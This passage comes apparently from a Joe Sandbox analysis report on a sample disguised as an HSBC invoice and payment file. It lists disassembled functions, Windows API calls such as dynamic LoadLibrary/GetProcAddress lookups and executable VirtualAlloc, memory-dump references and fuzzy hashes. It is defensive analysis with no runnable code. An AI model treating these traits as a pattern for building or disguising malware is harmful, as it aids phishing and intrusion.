                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 44ccacfcad9818bfb18e1b50b0947022da9aff565f8063062e4120067d66562d
                    • Instruction ID: f7ba138527055dea61a1b253bcc0472d1b4d379bc4d159fea317940f9def3656
                    • Opcode Fuzzy Hash: 44ccacfcad9818bfb18e1b50b0947022da9aff565f8063062e4120067d66562d
                    • Instruction Fuzzy Hash: 1A5111365052468FCF259F28C8886FA7BA6EF1A314F145056E895BF3A0D730AD47CB71
                    Function 00E93297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oa
                    • API String ID: 2620147621-3945284152
                    • Opcode ID: 923363c4d2b0f841ca3c7f6f4fe314dd8d51aca35be18384ff3c345424bcf3d3
                    • Instruction ID: 88c617e50ff532999c69d870c7c92ed3d06b8f81025608f1649c033c151685a9
                    • Opcode Fuzzy Hash: 923363c4d2b0f841ca3c7f6f4fe314dd8d51aca35be18384ff3c345424bcf3d3
                    • Instruction Fuzzy Hash: 3C514BB16083419FDB24CF68C441B6BBBE5FF89314F05592DE989A7361DB31E901CB52
                    Function 00E962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 67a1c09767811529c477e260b01a7cde94a81c0fab6c84a9955060a6bffa9165
                    • Instruction ID: 25a8374c2b898d3a67b77cfd0fb72098019d3eb661717191b1c1c02df1fa0648
                    • Opcode Fuzzy Hash: 67a1c09767811529c477e260b01a7cde94a81c0fab6c84a9955060a6bffa9165
                    • Instruction Fuzzy Hash: 0551B1719007099BDF24CFA5C8917AABBF4FF04718F20956FEA5AEB241E771A581CB40
                    Function 00EDDA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EDDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EDDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EDDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressProc
                    • String ID: DllGetClassObject
                    • API String ID: 1548245697-1075368562
                    • Opcode ID: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                    • Instruction ID: 58f94f37a34734f4fa4aea45e1ef29c63268e861a00d1bf3bb9df81d25debacf
                    • Opcode Fuzzy Hash: 674441d2896f76f38baca5a7756564c72c2c0b8c6e730f1d00b5faa431ea64e1
                    • Instruction Fuzzy Hash: 5F41AEB1604208EFDB14CF54CC84A9ABBA9EF48314F1591ABED05AF305D7B1DE45DBA0
                    Function 00F07BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F0F910,00000000,?,?,?,?), ref: 00F07C4E
                    • GetWindowLongW.USER32 ref: 00F07C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F07C7B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 250ab69f7bf8b5945491fc457b43592828a96f4d24f835a6e2eae0b8135f3f7a
                    • Instruction ID: 072eb4983c0f4394a49f8cd2614d61704f2a736a71e8e8687a7a645762a40cb6
                    • Opcode Fuzzy Hash: 250ab69f7bf8b5945491fc457b43592828a96f4d24f835a6e2eae0b8135f3f7a
                    • Instruction Fuzzy Hash: 45319231A04209ABDB21AF34CC41BEA77A9FB45334F248725F979A21E0D731EC51BB50
                    Function 00F07648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F076D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F076E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F07708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 80eb3aeffa55fca8550b1e00f2afac4df7d04687f0ff325a47b6e516688c0b4b
                    • Instruction ID: 9b45d69bd92dbb712df6c96452851743f33b8d51c683e6ed1570904cf08905e7
                    • Opcode Fuzzy Hash: 80eb3aeffa55fca8550b1e00f2afac4df7d04687f0ff325a47b6e516688c0b4b
                    • Instruction Fuzzy Hash: CF21D332900218BBDF21DF54CC42FEA3BA9EF48724F110254FE156B1D0DAB1B851ABA0
                    Function 00F06F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F06FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F06FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F06FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: f0948d6a86b434bb94f160f281b68e3b0872c050f442c18e46076c2fdbbbe16c
                    • Instruction ID: 0cdc6abc4bb2ff24dd3164b68f393097511397b93a56064f0b06b5b5156b4ccd
                    • Opcode Fuzzy Hash: f0948d6a86b434bb94f160f281b68e3b0872c050f442c18e46076c2fdbbbe16c
                    • Instruction Fuzzy Hash: B321C532A10119BFDF118F54DC85FAB37AAEF89765F018124F904DB1D0D6719C62A7A0
                    Function 00F0797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F079E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F079F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F07A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 215b3c0b56621b34bd4be3726c24bf41b66ea355e1ff17ce20b75dbd0e934f8e
                    • Instruction ID: c0a11547f449b975b3a67f83a2d261136194838d63a23f66b2630796aa90099b
                    • Opcode Fuzzy Hash: 215b3c0b56621b34bd4be3726c24bf41b66ea355e1ff17ce20b75dbd0e934f8e
                    • Instruction Fuzzy Hash: FB11E732A44208BAEF10AF60CC05F9B77A9EF89764F014519FA45A60E0D675E811EB60
                    Function 00EFC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC1D88,?), ref: 00EFC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EFC324
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 501b5a217fa0b23ff5cebc64d8ab917852c9dbaac741a459217b6b5648dc559b
                    • Instruction ID: 097ec5add6bc67fd73d878e559b1e73d382a96752575199380f546d57e3706f6
                    • Opcode Fuzzy Hash: 501b5a217fa0b23ff5cebc64d8ab917852c9dbaac741a459217b6b5648dc559b
                    • Instruction Fuzzy Hash: 94E0C2B460131BCFCB344F25C804A9676D4FF4879CFA0D47AE985E2650E770D840DBA0
                    Function 00E84C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84C2E), ref: 00E84CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E84CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: 0c0207db955199b77c6721cae29ceacf8bc8a3127ccddb67e5c57a9b6888dd3a
                    • Instruction ID: c0058e251011197f457bbcd2d245a9b58f7941af9e8ee41d589aa5b6a86e7da7
                    • Opcode Fuzzy Hash: 0c0207db955199b77c6721cae29ceacf8bc8a3127ccddb67e5c57a9b6888dd3a
                    • Instruction Fuzzy Hash: 9CD012B0510727CFD730AF31DD18606B6D9BF05755B21883A9889D6990D674D484EB51
                    Function 00E84D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84CE1,?), ref: 00E84DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E84DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 3f5afa4bc101afab34b08de5b13e5c07d1632991b09c76267dd6b3e419fb0789
                    • Instruction ID: 7cd69325f3ac464a59579df4b7d290b78503bc8280cc8b851f957cac282a7c9b
                    • Opcode Fuzzy Hash: 3f5afa4bc101afab34b08de5b13e5c07d1632991b09c76267dd6b3e419fb0789
                    • Instruction Fuzzy Hash: 0FD017B1950717CFD730AF31D808A46B6E4FF09359B11883AD8CAE69D0E770D884EB51
                    Function 00E84D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84D2E,?,00E84F4F,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E84D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: f68fa8e8cc0981327092dce9de57241784a62c874bd083b2765e6f04fe09f986
                    • Instruction ID: ad877013f3c286b039469b03f6f7f0c6dd3e624426580eaf0cea578e67d4c439
                    • Opcode Fuzzy Hash: f68fa8e8cc0981327092dce9de57241784a62c874bd083b2765e6f04fe09f986
                    • Instruction Fuzzy Hash: 0BD017B0910717CFD730AF31D808616B6E8BF5536AB118C3A988AE6AD0E770D884EB51
                    Function 00F01072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F012C1), ref: 00F01080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F01092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 3a8ab3f11ba80109025dc6d61f83ca35add158c302074e2e322bc6fb6ca86a19
                    • Instruction ID: 051f6453dacb361e124ab16d66f56ac64735c5b125cfe833fe00dda8cab62775
                    • Opcode Fuzzy Hash: 3a8ab3f11ba80109025dc6d61f83ca35add158c302074e2e322bc6fb6ca86a19
                    • Instruction Fuzzy Hash: 8AD0E230910712CFD7309B35E828A1BB6E4BF09361B11892AA8CADA590E770C880AA51
                    Function 00EF93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EF9009,?,00F0F910), ref: 00EF9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EF9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: e0d69fa9ad78bbe9bc20191f9428e178c70cd9f5c94ee79f2fc242e34a1e6666
                    • Instruction ID: feb17f1682fc1496bba1e7b980b5ac2e7c3ef39fe6449cdeff3264fff1e1214b
                    • Opcode Fuzzy Hash: e0d69fa9ad78bbe9bc20191f9428e178c70cd9f5c94ee79f2fc242e34a1e6666
                    • Instruction Fuzzy Hash: B9D0C73090031BCFC7318F32C948202B2E4BF14399B00C83AA8D2E2990E670C8C4EA51
                    Function 00ED76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba4238cf5b01649e2509ef7440868015469eddbe3e3506c54ed930c4e882e48c
                    • Instruction ID: 9dbdd675311b8226003f65ecf4debfe5e08de62dda9cd97676c3fab7bc41df33
                    • Opcode Fuzzy Hash: ba4238cf5b01649e2509ef7440868015469eddbe3e3506c54ed930c4e882e48c
                    • Instruction Fuzzy Hash: ACC17E75A04216EFCB14CF94C884EAEB7B5FF88714B11959AE885EB350E730DD82DB90
                    Function 00EFE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00EFE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 00EFE415
                      • Part of subcall function 00EFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EFE615
                    • _memmove.LIBCMT ref: 00EFE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
